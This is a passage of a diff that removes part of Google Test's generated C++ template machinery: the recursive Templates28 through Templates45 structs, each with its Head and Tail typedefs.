-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28>
-struct Templates28 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates27<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29>
-struct Templates29 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates28<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30>
-struct Templates30 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates29<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31>
-struct Templates31 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates30<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32>
-struct Templates32 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates31<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31, T32> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33>
-struct Templates33 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates32<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31, T32, T33> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34>
-struct Templates34 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates33<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31, T32, T33, T34> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35>
-struct Templates35 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates34<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31, T32, T33, T34, T35> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36>
-struct Templates36 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates35<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31, T32, T33, T34, T35, T36> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37>
-struct Templates37 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates36<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31, T32, T33, T34, T35, T36, T37> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38>
-struct Templates38 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates37<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31, T32, T33, T34, T35, T36, T37, T38> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39>
-struct Templates39 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates38<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40>
-struct Templates40 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates39<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40, GTEST_TEMPLATE_ T41>
-struct Templates41 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates40<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40, GTEST_TEMPLATE_ T41, GTEST_TEMPLATE_ T42>
-struct Templates42 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates41<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41,
-      T42> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40, GTEST_TEMPLATE_ T41, GTEST_TEMPLATE_ T42,
-    GTEST_TEMPLATE_ T43>
-struct Templates43 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates42<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42,
-      T43> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40, GTEST_TEMPLATE_ T41, GTEST_TEMPLATE_ T42,
-    GTEST_TEMPLATE_ T43, GTEST_TEMPLATE_ T44>
-struct Templates44 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates43<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42,
-      T43, T44> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40, GTEST_TEMPLATE_ T41, GTEST_TEMPLATE_ T42,
-    GTEST_TEMPLATE_ T43, GTEST_TEMPLATE_ T44, GTEST_TEMPLATE_ T45>
-struct Templates45 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates44<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42,
-      T43, T44, T45> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
